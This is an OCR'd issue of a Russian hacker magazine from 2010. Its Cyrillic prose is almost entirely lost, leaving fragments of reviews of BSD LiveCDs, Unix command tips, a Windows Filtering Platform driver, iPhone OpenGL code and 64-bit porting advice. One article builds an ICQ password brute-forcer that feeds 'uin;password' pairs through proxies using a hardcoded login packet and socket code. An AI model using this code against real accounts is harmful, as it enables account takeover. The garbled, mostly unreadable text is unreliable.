. ,
, CCC .
: 23-26
: ,
: https://deepsec.net
DreamHack
: 25-28
: , .
: http://www.dreamhack.se
- ,
. 90-,
, .
,
.
DreamHack, Chaos Conctractions,
X 03 /134/ 10
: 27-30
: ,
: http://www.ccc.de
Lanwar
: 2011
: ,
: http://www.lanwar.com
- ,
10 ( 1998 ).
. , Lanwar , ,
. ? ,

. , ( for fun), , , . ,
Lanwar, . z
091
UNIXOID
zobni n@gmail.com
BSD
LiveCD
BSD-
Linux BSD-
. ,
,
. ,
, BSD
, LiveCD
.
LINUX,
,

,
BSD-
.
- BSD,
. FreeBSD, NetBSD,
OpenBSD , ,
DragonFly BSD.
, .

BSD , , BSD-
,

,
. BSD,
.
092

BSD LiveCD.
BSD-, .
Frenzy,
FreeBSD (, ,
).
Jibbed BSDAnywhere,
NetBSD
OpenBSD. ( )
FreeBSD
PC-BSD DesktopBSD,
,
.
Frenzy
: frenzy.org.ua
(frenzy.bspu.ru)
: 1.3 (26 2010)
: FreeBSD 8.1
, -
,
Frenzy ,
BSD,
( , ][)
LiveCD

. ,
,
FreeBSD. Frenzy ,
, -,
, ,
Firefox, Opera, Chrome, XMMS,
MPlayer, Psi, Sylpheed.
Frenzy
,
5 15 .
FreeBSD,
, ACPI,

.

Frenzy,
,
X 11 /142/ 10
INFO
info
IceWM xfe BSDAnywhere

DesktopBSD:

, (
),
..
, .
startx X-
Fluxbox, Conky
,
idesk
xxkb ( ).
, ,
. -
,
. ,
,
, .
- , FreeBSD
, Frenzy,
.
Fluxbox, ,
. ,
:
: Opera, Firefox, Chrome, Dillo, Elinks,
Lynx.
Sylpheed Mutt.
Leafpad Vim.
Psi, Irssi, CenterIM.

aircrack-ng.
VPN- openvpn, pptp-client vpnc.
trafshow, bmon, darkstat, iftop.
3proxy, stunnel
.
TOR.
telnet,
rdesktop vnc.
nmap.
nessus nikto.
wireshark ettercap.
IDS Snort.
ClamAV
ClamTK.
VirtualBox.
.

/ .
.
,
Frenzy
X 11 /142/ 10
FrenzyConf ( frconf, ),
( ,
..),
(ADSL, LAN, VPN) , .
, Frenzy
USB-Flash.
FreeBSD, ,
.
FreeBSD , Frenzy,
, KDE, , .
BSDAnywhere
: bsdanywhere.org
: 4.6 (5 2009)
: OpenBSD 4.6
BSDAnywhere LiveCD OpenBSD.
<Enter>
. OpenBSD
- , , , ACPI,

(boot -c; disable
acpi; quit). , ,
OpenBSD. :
.
, ,
.
: .

LiveCD, GMT,
. : . DHCP-,
<Enter>, no
.
getty . LiveCD
: live root, . live
X-
IceWM . : xterm,
xfe, xfi,
2006
PC-BSD

iXsystems,

,

.
PBI- PC-BSD

FreeBSD
,

.

1.7
,
DesktopBSD,

.
20
2010

.
2009

Frenzy 1.2Lite.
,

FreeBSD.
1.2 1.3

.
093
UNIXOID
DesktopBSD
Frenzy
xmms, Firefox, Thunderbird Mutt, IRC- irssi,

OpenNX VNC.
, LiveCD OpenBSD, OpenSSH OpenCVS.
LiveCD, ,
OpenBSD ,
.
PC-BSD FreeBSD

Jibbed NetBSD
: www.jibbed.org
: 5.0.1 (27 2009)
: NetBSD 5.0.1
, LiveCD
Jibbed ( ),
,
. VirtualBox
qemu, ,

. , ACPI
. ACPI , .

, ,
DHCP, X.org.
ksh .
.
startx ,
, . (,
<Ctrl+Alt+F2>, <Alt+F2>, Linux
FreeBSD), root /etc/X11/xorg.
conf (, vim ).
,
Xfce.
LiveCD- . , NetBSD,
Xfce ,
AbiWord, bash zsh, emacs,
pdf- epdfview, feh,
Firefox3, IM- pidgin, -
xfmedia, rdesktop, squid, screen, joe, mc, mpg321 wget.
NetBSD , ,

.
094
: www.pcbsd.org
: 8.1 (20 2010)
: FreeBSD 8.1
PC-BSD FreeBSD,
BSD- , .
,
BSD Installer, PBI,
,
.
ISO- 3,5 ,
FreeBSD, KDE4
.
, splash-, X- FluxBox , - BSD Installer.
, PC-BSD
:
( ),
( -
, ), ( ), (PC-BSD
FreeBSD ) (DVD ).
(PC-BSD ,
),
, (
Jail), .
,
KDE4 .
,
, , , ,
(, , DHCP-).
,
, . KDE , PC-BSD ,
( )
.

Software Manager,
.
X 11 /142/ 10
PC-BSD FreeBSD
Xfce Jibbed
Linux
deb- synaptic:
, ,
.

pbi,
.
/usr/local, FreeBSD,
/Programs ( Windows Mac OS X).
PC-BSD, ,
/Programs.
,
, Linux (
,
).
KDE ( )
, PC-BSD. , ,
, IP-
. -, System Manager,
,
FreeBSD. -, Services Manager,
.
FreeBSD,
.
DesktopBSD FreeBSD

: www.desktopbsd.net
: 1.7 (7 2009)
: FreeBSD 7.2
PC-BSD DesktopBSD .
,
, BSD
Installer,
KDE. , DesktopBSD
,

.
DesktopBSD ISO-,
.
FreeBSD,
<Enter>.
, , ,
<Ctrl+Alt+Backspace>
.
(live install), , PC-BSD
.
X 11 /142/ 10
PC-BSD
Install ,
PC-BSD,
. : , , ,
( ), (
), , (
).
, .
DesktopBSD
! ,
.
. , ,
, ,
.
. BSDStats,

. BSDStats ,
BSD-, , ,
.
, . , DesktopBSD
KDE 3.5 ,
( -
).
KDE, , , , ,
.
(),
.

(
).
, ,
OpenOffice 3.1.1, Java SE 6, Amarok,
Firefox Gimp.
GRUB
.
, BSD
,

. LiveCD NetBSD OpenBSD , Frenzy, PC-BSD DesktopBSD ,
BSD ,
, Linux.z
095
UNIXOID
zobni n@gmail.com

UNIX
, ,
.

- .
,
,
.
,
, ,

.

,
.
Google
Google ,
,
,
- . Google
,
-
096

.
?
Youtube ?

.
, ,
,
.

,

, .

Google.
GoogleCL (http://
code.google.com/p/googlecl/), -
Google.
,
google,
,
, , Gmail/Android
( Google), Google
Docs,
Picasa Youtube.

, .

(picasa, blogger, youtube, docs, contacts
calendar), , , .

, ,
X 11 /142/ 10
INFO
info
Dropbox

Google
Chrome,
,

Google
( ,

).
Google Docs gmount

Picasa get, create, list, list-albums, tag, post delete,
Blogger post, tag, list delete. , , --title
Blogger Youtube,
--summary
Picasa . ,
, -
. :
1. Blogger:
$ google blogger post --blog 'Linuxoid' --title
'GoogleCL !' --tags 'linux, cli' '
GoogleCL, bla-bla, bla'
2. :
$ google calendar add ' '
3. :
$ google contacts add ' ,zobnin@gmail.com'
4. Google Docs (
,
EDITOR):
Google, , Youtube.
, Youtube youtube-dl (http://bitbucket.org/rg3/youtube-dl/
wiki/Home).
, . Youtube
metacafe.com, Google Video, Photobucket, Yahoo! video, Dailymotion
.
, ,
UNIX- flv- ?

, , ( -u -p),
(-b -d HD-),
( -c). ,
man-. URL
. , ytsearch:HTC Desire, , HTC Desire.
Google Video Yahoo! video
gvsearch ybsearch.

,
Google Docs . gdocs-mountgtk Ubuntu . , :
$ google docs edit --title " "
5. Picasa ( ):
$ google picasa create --title " " \
~/photos/*.jpg
6. Youtube:
$ google youtube post --category Comedy .avi

Google- ( Gmail) ,
GoogleCL . .
GoogleCL ,
X 11 /142/ 10
$ sudo add-apt-repository ppa:doctormo/ppa

$ sudo apt-get update
$ sudo apt-get install gdocs-mount-gtk
: Google
Docs Connection. ,
Gnome Nautilus,
KDE. ,
, google-docs-fs, :
$ sudo apt-get install google-docs-fs
: gmount gumount,
:
097
UNIXOID
web-
mplayer
- Linux
video for linux (v4l), ,
, mplayer:
mplayer tv://.
.
:
$ mencoder tv:// -nosound -ovc lavc -lavcopts
vcodec=mjpeg -o video.avi
,
:
$ mplayer tv:// -tv device=/dev/video1

Gmote
$
$
$
$

Gmote
mkdir gdocs
mount @gmail.com gdocs
ls gdocs
gumount gdocs
Dropbox

- Dropbox,
. ,
( iOS Android), ,
,
( ,

-). Dropbox ,
. Dropbox ,
-,
. ,
Dropbox
.
1. -.
Linux -
- .
, -
, ,
. Dropbox
,

,
. ~/Dropbox torrents - ,
, .
, ( , ), ,
.
2. .
KeePassX, ,
( , -
098
).
(Windows- KeepPass),
, . ,
~/Dropbox,
.
3. Firefox. ,
Firefox ,
, (
) , ,
, , .
, , ,
, , Dropbox.
~/Dropbox:
$ mkdir ~/Dropbox/fx_profile
( XXX , ):
$ mv ~/.mozilla/firefox/XXX.default/* ~/Dropbox/fx/
profile
, Firefox (XXX
):
$ ln -s ~/Dropbox/fx/profile ~/.mozilla/firefox/XXX.
default
,
, (rm -rf
~/.mozilla/firefox/*.default) ,
.
4. . , ,
, Windows.
portablelinuxapps.org
,
Linux-. Dropbox,
,
.
5. Linux-. wiki.
getdropbox.com , Linux- ,
, Dropbox.
: dl.getdropbox.
com/u/30722/dropbox_server.sh dl.getdropbox.com/u/30722/dropbox_
X 11 /142/ 10
client.sh. ~/Dropbox,
dropbox_server.sh, dropbox_client.sh.
(Enter Command:) ,
, .
, ,
,
, . ,
,
mc :). ,

Dropbox, .
, Dropbox
- , ,
.
X-
,
. X- , C,
,
, - , . X- ,
, ,
- ,
, ,
, X- . -

. ~/.xinitrc.
,
-X- Xnest,
X-.
:
$ sudo apt-get install xnest
$ Xnest :1 -ac
:1 X-, ( : 127.0.0.1:1). X- :0, ,

, .
-ac ,
- ( )
.
X-, Xnest ,
,
. , ,
DISPLAY Xnest (
):
$ DISPLAY=:1
X-. ,
,
. , Xephyr ( xserver-xephyr),
Xnest, :
$ Xephyr :1 -ac
X 11 /142/ 10
awesome KDE
, UNIX ,
,
. D-BUS,
,
EWMH (NetWM), .
D-BUS EWMH,
. D-BUS ,
(
, ][ 09.2010), EWMH .

,

.
EWMH- wmctrl.
,
.
(
) , . ,
,
, . :
1. Firefox
:
$ wmctrl -a Firefox
2. google-chrome
:
$ wmctrl -R google-chrome
3. Firefox:
$ wmctrl -r Firefox -e '0,6,0,1040,708'
4. / Xterm:
$ wmctrl -r 'Xterm' -b toggle,shaded
5. Xterm 2:
$ wmctrl -r 'Xterm' -t 2
Wmctrl ,
( -
099
UNIXOID
DNS- IP-
Dropbox
Wikipedia , DNS-
Wikipedia
www.commandlinefu.com.

:
#!/bin/sh
dig +short txt ${1}.wp.dg.cx
xhotkeys, xbindkeys
keytouch).
,
, ,
,

-, -
. , .
, ,
,
-
.
-.
Wi-Fi,
, ,
, ,
.
Android,
Wi-Fi (
Symbian, Windows Mobile). Remote
100
Control Android Market ,

-, PRemoteDroid, Unified Remote
Windows Gmote (www.gmote.org),
Linux-
. .

. (sites.google.com/site/
marcsto/GmoteServerLinux2.0.0.tar.gz),
Java-. , Java Java,
:
$ sudo apt-get install openjdk-6-jre
./GmoteServer.sh ,
- (, ~/video ~/
music) , .
, , .

play, stop, pause ..
,
vlc (
).
, , ,
.
. . ;
, ,
UNIX.z
X 11 /142/ 10
CODING
r0064 r0064@mail.ru
Windows
Filtering Platform
Windows
Filtering
Platform

Server 2008 Vista WFP,

API .
,
.

. kernel-mode,
user-mode .
fwpkclnt.sys, fwpuclnt.dll ( k
u kernel user ).
WFP
, WFP .
102

, :). ,
.
,
. : ,
callout.
CALLOUTS ,
X 11 /142/ 10
>> coding

. ,
.
:
(FWP_ACTION_PERMIT);
(FWP_ACTION_BLOCK);
;
;
.
(FILTERS) , ,
callout.
callout, callout
. , , ,
NAT-callout.
LAYER , (, MSDN, ).
, Microsoft (
), ,
WDK. ,
- ,
. ,
. WDK (Windows Driver Kit),
VmWare,
WinDbg. WDK,
7600.16385.0 (
, fwpkclnt.lib ntoskrnl.lib)
WFP.
, .
Coding
callout
BlInitialize.
callout
:
1) FWPMENGINEOPEN0 ;
2) FWPMTRANSACTIONBEGIN0 WFP;
3) FWPSCALLOUTREGISTER0 callout;
4) FWPMCALLOUTADD0 callout
;
5) FWPMFILTERADD0 ();
6) FWPMTRANSACTIONCOMMIT0 ( ).
, 0.
Windows 7 ,
, FwpsCalloutRegister1 ( FwpsCalloutRegister0). , ,
X 11 /142/ 10
guidgen.exe Microsoft GUID

, 0-
.
FwpmEngineOpen0 FwpmTransactionBegin0

.
FwpsCalloutRegister0:
FwpsCalloutRegister0
NTSTATUS NTAPI FwpsCalloutRegister0
(
__inout void *deviceObject,
__in const FWPS_CALLOUT0 *callout,
__out_opt UINT32 *calloutId
);
, callout ,
.
FWPS_CALLOUT0
(classifyFn)
( / (notifyFn)
(flowDeleteFn)).
,
, , .
, GUID (calloutKey).
HTTP://WWW
links
http://msdn.
microsoft.com/
en-us/library/
aa366510(VS.85).aspx

Windows Filtering
Platform MS.
www.komodia.com/
index.php?page=wfp.
html

LSP-
,
WFP.
callout
FWPS_CALLOUT sCallout = {0};
sCallout.calloutKey = *calloutKey;
sCallout.classifyFn = BlClassify;
//
sCallout.notifyFn =
(FWPS_CALLOUT_NOTIFY_FN0)BlNotify;
// , /

//
status = FwpsCalloutRegister
(deviceObject, &sCallout, calloutId);
103
CODING
-callout (layer)
FwpmCalloutAdd0:
DWORD WINAPI FwpmCalloutAdd0(
__in
HANDLE engineHandle,
__in
const FWPM_CALLOUT0 *callout,
__in_opt
PSECURITY_DESCRIPTOR sd,
__out_opt UINT32 *id
);
typedef struct FWPM_CALLOUT0_ {
GUID
calloutKey;
FWPM_DISPLAY_DATA0 displayData; // callout
UINT32
flags;
GUID
*providerKey;
FWP_BYTE_BLOB
providerData;
GUID
applicableLayer;
UINT32
calloutId;
} FWPM_CALLOUT0;
FWPM_CALLOUT0 applicableLayer
, callout.
FWPM_LAYER_ALE_AUTH_CONNECT_V4. v4
Ipv4,
FWPM_LAYER_ALE_AUTH_CONNECT_V6 Ipv6.
Ipv6 , Ipv4. CONNECT ,
,
! , ,
fwpmk.h WDK.
-callout
// callout
displayData.name = L"Blocker Callout";
displayData.description = L"Blocker Callout";
mCallout.calloutKey = *calloutKey;
mCallout.displayData = displayData;
// callout
//FWPM_LAYER_ALE_AUTH_CONNECT_V4
mCallout.applicableLayer = *layerKey;
status = FwpmCalloutAdd(
gEngineHandle,
&mCallout,NULL,NULL);
, , callout , , ,
callout, .
104
FwpmFilterAdd0,
FWPM_FILTER0.
FWPM_FILTER0 FWPM_FILTER_
CONDITION0 ( numFilterConditions).
layerKey GUID (layer),
. FWPM_LAYER_
ALE_AUTH_CONNECT_V4.
FWPM_FILTER_
CONDITION0. -, fieldKey ,
, , - .
WPM_CONDITION_IP_REMOTE_ADDRESS
, IP-. fieldKey ,
FWP_CONDITION_VALUE,
FWPM_FILTER_CONDITION0.
ipv4-. . matchType ,
FWP_
CONDITION_VALUE , . :
FWP_MATCH_EQUAL, -

filter.flags = FWPM_FILTER_FLAG_NONE;
filter.layerKey = *layerKey;
filter.displayData.name = L"Blocker Callout";
filter.displayData.description =
L"Blocker Callout";
filter.action.type = FWP_ACTION_CALLOUT_UNKNOWN;
filter.action.calloutKey = *calloutKey;
filter.filterCondition = filterConditions;
//
filter.numFilterConditions = 1;
//filter.subLayerKey = FWPM_SUBLAYER_UNIVERSAL;
filter.weight.type = FWP_EMPTY; // auto-weight.
//
filterConditions[0].fieldKey =
FWPM_CONDITION_IP_REMOTE_ADDRESS;
filterConditions[0].matchType = FWP_MATCH_EQUAL;
filterConditions[0].conditionValue.type =
FWP_UINT32;
filterConditions[0].conditionValue.uint32 =
ntohl(BLOCKED_IP_ADDRESS);
//
status = FwpmFilterAdd(
gEngineHandle,
&filter,
NULL,
NULL);
X 11 /142/ 10
>> coding

run
, FWP_MATCH_NOT_EQUAL, , ,
(, ).
FWP_MATCH_GREATER, FWP_MATCH_LESS (. FWP_
MATCH_TYPE). FWP_MATCH_EQUAL.
IP-. , -
, callout.
, ,
.
, , . ,
(FWPM_CONDITION_IP_REMOTE_PORT
FWPM_CONDITION_IP_LOCAL_PORT ). . ! , ,
. , .
, .
(BLOCKED_
IP_ADDRESS), FWP_ACTION_BLOCK:
classify-
void BlClassify(
const FWPS_INCOMING_VALUES* inFixedValues,
const FWPS_INCOMING_METADATA_VALUES* inMetaValues,
VOID* packet,IN const FWPS_FILTER* filter,
UINT64 flowContext,FWPS_CLASSIFY_OUT* classifyOut)
{
// FWPS_CLASSIFY_OUT0
if(classifyOut){ //
classifyOut->actionType = FWP_ACTION_BLOCK;
// FWPS_
RIGHT_ACTION_WRITE
classifyOut->rights&=~FWPS_RIGHT_ACTION_WRITE;}}
FWP_
ACTION_PERMIT, FWP_ACTION_CONTINUE .
callout (, ,
callout ? , BSOD). FwpsCalloutUnregisterById.
32- callout, FwpsCalloutRegister.
callout
NTSTATUS BlUninitialize(){
NTSTATUS ns;
if(gEngineHandle){
FwpmEngineClose(gEngineHandle);
X 11 /142/ 10

}
if(gBlCalloutIdV4){
ns =FwpsCalloutUnregisterById(gBlCalloutIdV4);
}
return ns;
}
. ,
WFP- ,
MS API. ,
,
! , wdk msnmntr (
MSN Messenger-)
kernel-mode .
GUID
callout .
, GUID (Globally Unique Identifier), guidgen.exe, Visual Studio. (VS_Path)\
Common7\Tools. ,
GUID 128 , 2^128 .
Windbg+VmWare.
(
Vista), WinDbg. WinXP
boot.ini, Vista+ bcdedit. , :
BCDedit /dbgsettings SERIAL DEBUGPORT:1
BAUDRATE:115200
BCDedit /debug ON ( BCDedit /set debug ON)

(. ).
! :
start windbg -b -k com:pipe,port=\\.\pipe\
com_1,resets=0
windbg (. ).
, WFP . ,
:).z
105
CODING
RankoR ax-soft.ru
DVD
, ,
-,
, -,
:)
, ?

2008 ,
OstWay, SRQ Brute ICQ
( ICQ) .
ICQ. , ,
.

, ,
? , .
, SOCKS-,
. :
1. , - IP IPv4 , NAT,
, , . ;
2. 99% ,
, .
, ?, . ,
.
? (SOCKS4/5 HTTP(s)), , .
- ,
uin;password,

, , , .
, . .
106
C++ WinSock ( MS Visual

C++ 2008 Express; , ),
C++ Qt,
, + ,

?
ICQ
ICQ?
( ,
, ), :
( : , )
1. ICQ;
2. Hello-. 0x2a (
ICQ);
3. ( UIN,
, , ..);
4.
.
, .
0x2a, ,
X 11 /142/ 10
>> coding
. , , SRV_COOKIE,
BOS-, , ,
.
. ,
( 0x04,
CLOSE_CONNECTION).
OSCAR
, , :
TLV Type, Length, Value
. 0x02 + 0x02 + BLOB .
,
(uint16), .
SNAC Simple Network Atomic Communication, family , type
, , requestId (
, 0x00) ,
, .
FLAP ,
. FLAP
, 0x2a, (0x01
, 0x02 , 0x03 ( ), 0x04
, 0x05 (KeepAlive)).
sequence
, .
, ,
, .
, CLI_
IDENT:
TLV 0x0001 UIN
TLV 0x0002
XOR
"\xf3\x26\x81\xc4\x39\x86\
xdb\x92\x71\xa3\xb9\xe6\x53\x7a\x95\x7c"
TLV 0x0003 ClientID , . ICQ Client AIM
TLV 0x0016 ,
TLV 0x0017, 0x0018, 0x0019, 0x001A, 0x0014
,
TLV 0x000E, 0x000F . (us, en
ru, ru, )
(
),
, , ,
!
TCP
( , ICQ).
, ,
:
class Socket {
public:
bool connectToHost(
const char *hostName,
int port);
X 11 /142/ 10
bool sendData(
const char *buff,
int length);
bool receiveData(
char *buff,
int length);
int bytesAvailable();
void disconnectFromHost()
{
closesocket(sock);
}
private:
SOCKET sock;
};

-.
ICQ- ,
ICQ-:
if(!sock.connectToHost("login.icq.com",
5190))
return false;
HTTP://WWW
links
oscar.asechka.ru
OSCAR
.
WARNING
warning
.
char buff[16];
memset(buff, 0, 16);
sock.receiveData(buff, 10);
if ( buff[0] != 0x2A )
{
sock.disconnectFromHost();
return false;
}
return true;
, ,
, ?
if ( ! sock.connectToHost("login.icq.com",
5190))
return false;
if ( ! bruteSock.sendData(
"\xD\xE\xA\xD\xB\xE\xE\xF", 8) )
{
bruteSock.disconnectFromHost();
return false;
}
char data[8];
if ( ! bruteSock.receiveData(data, 8) ||
memcmp(data, "\xF\xE\xE\xB\xD\xA\xE\xD", 8))
{
bruteSock.disconnectFromHost();
return false;
}
return true;
UIN
.
memset(uin, 0x00, UIN_LENGTH);
memset(pass, 0x00, PASS_LENGTH);
/* Receive uin & pass */
bruteSock.receiveData(uin, 9);
bruteSock.receiveData(pass, 8);
.............
107
CODING
CLI_IDENT ,
, ICQMenace ,
UIN Password, .
, C-style
:).
, , :
ICQMenace v0.9
const char loginData[] = "\x00\x1c\xf0\x21\xcf
\x4a\x00\x1f\xc6\xbd\x83\xdc\x08\x00\x45\x00"
"\x00\x87\x3a\xd4\x40\x00\x80\x06\xec\x16\x0a
\x96\x00\x08\xcd\xbc"
"\xfb\x2b\x07\x48\x14\x46\xa6\xdd\x20\x4c\xa5
\x9e\x57\xa1\x50\x18"
"\xff\xf5\x64\xd3\x00\x00\x2a\x01\x50\x31\x00
\x59\x00\x00\x00\x01"
"\x00\x01\x00%d%sx00\x02\x00%d"
"%s\x00\x03\x00\x0a\x49\x43\x51\x20\x43\x6c
\x69"
"\x65\x6e\x74\x00\x16\x00\x02\x01\x0a\x00\x17
\x00\x02\x00\x06\x00"
"\x18\x00\x02\x00\x05\x00\x19\x00\x02\x00\x00
\x00\x1a\x00\x02\x00"
"\x68\x00\x14\x00\x04\x00\x00\x75\x37\x00\x0f
\x00\x02\x65\x6e\x00"
"\x0e\x00\x02\x75\x73";
ICQ-, ,
, , , 0 , 1 , 2 .
Qt. Qt
TCP- QTcpServer. ,
:
bool listen (
const QHostAddress & address = QHostAddress::Any,
quint16port = 0)
.
(QHostAddress::Any) .
, :
void QTcpServer::newConnection () [signal]
,

QTcpSocket * QTcpServer::nextPendingConnection ()
,
.
(), , :
QtcpSocket *socket = server->
nextPendingConnection();
108
if ( socket == NULL ) {
// Shaitan!!!111
return;
}
socket->write(QByteArray::fromHex(DEADBEEF);
socket->waitForReadyRead();
if ( socket->readAll() != QByteArray::fromHex(
"FEEBDAED") )
// Error
else
// success
socket->disconnectFromHost();
socket->waitForDisconnected();
delete socket;
. :
bool QAbstractSocket::waitForReadyRead (
int msecs = 30000 )

, ,
, msecs ( ). ,
, ,
waitForDisconnected(),
.
QtNetwork .pro.
:
QT += network
, , !
?
1. CLI_IDENT;
2. ;
3. - ,
, .
, ICQ- (CONNECTION_CLOSE). ,
UDP- -
-
( ,
:)).
QUdpSocket. ,
ICQ-;
. z
X 11 /142/ 10
CODING
Fagot salieff@mail.ru
DVD

OpenGL
iPhone
3D-
iPhone SDK
iPhone,
UIKit, Core Graphics Cocoa
Touch, Objective-C .
, Mac OS X,
. - OpenGL ES,
OpenGL
.

, Apple
, iPhone SDK
Mac OS X. , GCC ARM v6 LLVM, .
, , , Mac OS X.
, .
, OSX86,
Mac OS X PC
( )
hackintosh. , , ,
,
SSE3, XNU/Voodoo
.
, , xCode , IDE
GCC. iPhone SDK, Apple
( ,
, ).
- , ,
.
110

GLES-
, , xCode , , , . ,
IDE , GLES,
. Project New Project iPhone OS Application
OpenGL ES Application Choose ,
.
. , render
ESRenderer, ,

.
AppDelegate, /
/ .
GLES EAGLView,
OpenGL-, , .

ESRenderer, . , , .
X 11 /142/ 10
>> coding
xCode IDE
glMatrixMode(GL_PROJECTION);
glEnable(GL_DEPTH_TEST);
glEnable(GL_CULL_FACE);
glFrustumf(...);
glViewport(0, 0, backingWidth,
backingHeight);

.
ESRenderer.h, ES2Renderer.m/h
Shaders,
. ES1Renderer
NSObject, ESRenderer
. EAGLView::initWithCoder
: renderer
= [[ES1Renderer alloc] init].
, . , ,
Objective-C - C++. , .
.m
.mm Objective-C
C++ ,
Cube.mm Cube.h
:
class GLCube {
public :
static GLCube * getInstance();
static void destroyInstance();
void render();
private :
GLCube();
~GLCube();
static GLCube *_internal_instance;
};
ES1Renderer::render.
,
. OpenGL, , , 3D, Z- . 60-
glFrustumf :
X 11 /142/ 10
C++ :
GLCube::getInstance()->render();
, , .

. , ES
glBegin/glEnd,
; ,
, .
ES
.
, GLCube::render 72
12 (3 4
):
static const GLfloat verts[] = {...};
glClear(
GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT);
glLoadIdentity();
glTranslatef(0.0f,0.0f,-4.0f);
glEnableClientState(GL_VERTEX_ARRAY);
HTTP://WWW
links
www.insanelymac.
com, www.applelife.
ru, www.projectosx.
com

.
developer.apple.com/
iphone
.
WARNING
warning

AppStore-,

.
for (size_t i=0; i<6; ++i)

{
glVertexPointer(3, GL_FLOAT, 0, verts+i*12);
glDrawArrays(GL_TRIANGLE_FAN, 0, 4);
}
,
.
, . ,
111
CODING

OpenGL. ES1Renderer::render
, OpenGL-, .
:
glEnable(GL_LIGHTING);
glEnable(GL_LIGHT0);
(
):
glMaterialfv(GL_FRONT_AND_BACK,
GL_AMBIENT, matAmbient);
GL_DIFFUSE, matDiffuse);
GL_SPECULAR, matSpecular);
glMaterialf(GL_FRONT_AND_BACK,
GL_SHININESS, lightShininess);

nsTexName];
CGImageRef spriteImage = uiImage.CGImage;
CG*
CoreGraphics. CoreGraphics Framework
,
, .
iPhone SDK,
Frameworks .
,
. RGBA, ,
4:
:
glLightfv(GL_LIGHT0, GL_AMBIENT, lightAmbient);
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightDiffuse);
glLightfv(GL_LIGHT0, GL_POSITION, lightPosition);
, ,
:
glShadeModel(GL_FLAT);
,
.
,
. . OpenGL
.
. , UIImage iPhone SDK.
,
256x256 (
OpenGL-) . GLCube GLCube::loadTexture(const char *tex_name),
.

UIImage, :
NSString* nsTexName = [[NSBundle mainBundle]
pathForResource: [NSString stringWithUTF8String:
tex_name] ofType:nil];
UIImage* uiImage = [UIImage imageWithContentsOfFile:
112
int tex_width = CGImageGetWidth(spriteImage);

int tex_height = CGImageGetHeight(spriteImage);
GLubyte *spriteData = (GLubyte *) malloc(tex_width *
tex_height * 4);
.
,
,
UIImage . , :
CGContextRef spriteContext = CGBitmapContextCreate(s
priteData, tex_width, tex_height, 8, tex_width * 4,
CGImageGetColorSpace(spriteImage), kCGImageAlphaPrem
ultipliedLast);
UIGraphicsPushContext(spriteContext);
[uiImage drawInRect:CGRectMake(0, 0, tex_width,
tex_height)];
UIGraphicsPopContext();
CGContextRelease(spriteContext);
spriteData OpenGL-

GLCube::tex_id .
.
ES1Renderer::render OpenGL-:
glEnable(GL_TEXTURE_2D);

X 11 /142/ 10
>> coding
, (
). GLCube::render:
static const GLfloat texCoords[] = {...};
...
glBindTexture(GL_TEXTURE_2D, tex_id);
glEnableClientState(GL_TEXTURE_COORD_ARRAY);
...
glTexCoordPointer(2, GL_FLOAT, 0, texCoords + i*8);
,
, id tech 4.
, , ,
. GLCube
ang_x ang_y, incrementAngles.
, render, :
glRotatef(ang_x, 0.0f, 1.0f, 0.0f);
glRotatef(ang_y, 1.0f, 0.0f, 0.0f);
.
UIView,
EAGLView, EAGLView.mm .
:
- (void)touchesBegan:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}

,
:
X 11 /142/ 10
- (void)touchesMoved:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
int delta_x =
[touch locationInView:self].x - last_touch_x;
int delta_y =
[touch locationInView:self].y - last_touch_y;
GLCube::getInstance()->incrementAngles(
180.0f*delta_x/320.0f, 180.0f*delta_y/480.0f);
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}
:
- (void)touchesEnded:(NSSet*)touches
withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }
- (void)touchesCancelled:(NSSet*)
touches withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }
,
,
iPhone.
Tips & Tricks
,
, .
1. Default.png 320x480
.
splash-screen, ;
2. Icon.png 57x57
. Resources *.plist, , Icon file Icon.png.
;
3. Status bar is
initially hidden . .
. ! .z
113
CODING
deeonis deeonis@gmail.com
64-
. ,
. 2 . 64- ,
. , . , 32- .
, 64-.
64- IA64 Intel 64 ( AMD64/x86-64/
x64). Intel Hewlett
Packard Itanium Itanium
2. x86
.
x86-64 , IA64.
x64 64- ,
,
, 32- .
64 , Microsoft
Windows XP.
WoW64 (Windows-on-Windows 64),
32-
64- ,
64- , , x86.
Intel 64,

32- 64-.
x64 16
,
16 . ,
. , Windows 7 Home
Basic 8 , Windows 7 Ultimate
192 .
, 64-,
, x64 .
, Visual Studio 6.
CSampleApp, CWinApp.
WinHelp, . :
114
WinHelp
class CWinApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
}
class CSampleApp: public CWinApp
{
}
Visual Studio 2005,

WinHelp CWinApp .
DWORD_PTR,
DWORD.

class CWinApp
{
//
virtual void WinHelp(DWORD_PTR dwData, UINT nCmd);
}
class CSampleApp
{
}
,
32-,
x64-,
WinHelp. , 64- DWORD
DWORD_PTR,
, , .
,
MFC, .
.
X 11 /142/ 10
64-
. , 32-
64- , , ,
size_t, . :

static void NumOfBits(const unsigned __int32 &)
{
printf(32- );
}
static void NumOfBits(const unsigned __int64 &)
{
printf(64- );
}
, x86-, , x64 .
. . , , .
, ,
. ,
32- , 64
.

class MyStack {
...
public:
void Push(__int32 &);
void Push(__int64 &);
void Pop(__int32 &);
void Pop(__int64 &);
}
MyStack stack;
// x64 8
ptrdiff_t value1;
stack.Push(value1);
// 4!!!
int value2;
stack.Pop(value2);
ptrdiff_t, int.
x86 , Intel
X 11 /142/ 10
PVS-Studio 64bit-
64 ptrdiff_t - int.
, ,
, .
,
.
32-
,
, .
x64-. ,
x86-, 64- .
, 64-
// 1
size_t ArraySize = N * 4;
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2
size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * 4);
// 3
size_t n, r;
n = n >> (32 - r);
,
, 4 .
32 , Intel 64
out of memory. size_t 4 ,
. , , , size_t.
,
sizeof()
<limits.h>, <inttypes.h> ..

// 1
size_t ArraySize = N * sizeof(intptr_t);
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2
115
CODING
Microsoft Visual Studio 2010 64

size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * sizeof(size_t));
// 3
size_t n, r;
